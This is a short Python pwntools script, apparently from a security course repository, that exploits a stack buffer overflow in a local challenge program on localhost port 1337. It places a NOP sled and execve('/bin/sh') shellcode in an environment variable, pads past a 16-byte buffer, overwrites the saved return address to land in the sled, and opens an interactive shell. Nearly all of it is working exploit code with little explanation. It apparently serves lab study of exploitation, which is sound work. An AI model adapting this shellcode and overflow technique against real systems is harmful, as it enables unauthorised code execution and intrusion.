mirror of
https://github.com/20kaushik02/CSE545_SS_Work.git
synced 2025-12-06 07:54:07 +00:00
38 lines
1.1 KiB
Python
38 lines
1.1 KiB
Python
from pwn import *
|
|
|
|
context.arch = "amd64"
|
|
|
|
# observed range of offsets are smaller than before
|
|
# NOP sled with comfortable room for error
|
|
sled_len = 0x5000
|
|
|
|
# BEFORE PROCEEDING, STOP AND DO THIS AND THEN REEXECUTE THE CHALLENGE EXE
|
|
# place shellcode in environment to get around buffer limit
|
|
|
|
# export SHELLCODE_CMD=$(python3 -c "import sys; sys.stdout.buffer.write(b'\x90' * 0x5000 + b'\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x2f\x73\x50\x48\x89\xe7\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xf6\x56\x6a\x08\x5e\x48\x01\xe6\x56\x48\x89\xe6\x31\xd2\x6a\x3b\x58\x0f\x05')")
|
|
|
|
host = "localhost"
|
|
port = 1337
|
|
# io = start(env={"SHELLCODE_CMD": payload})
|
|
|
|
buf_size = 0x10 # 16
|
|
|
|
main_rsp_addr = 0x7fff4333fc80 # given by program
|
|
|
|
target_env_addr_proximity = main_rsp_addr + sled_len
|
|
|
|
saved_rip_offset = 0x28
|
|
|
|
payload = (
|
|
b"a" * (buf_size) # padding, fill the buffer
|
|
+ b"b" * (saved_rip_offset - buf_size) # padding, fill gap between buffer and saved rip
|
|
+ p64(target_env_addr_proximity)
|
|
)
|
|
|
|
print(payload)
|
|
target = remote(host, port)
|
|
|
|
target.sendline(payload)
|
|
|
|
target.interactive()
|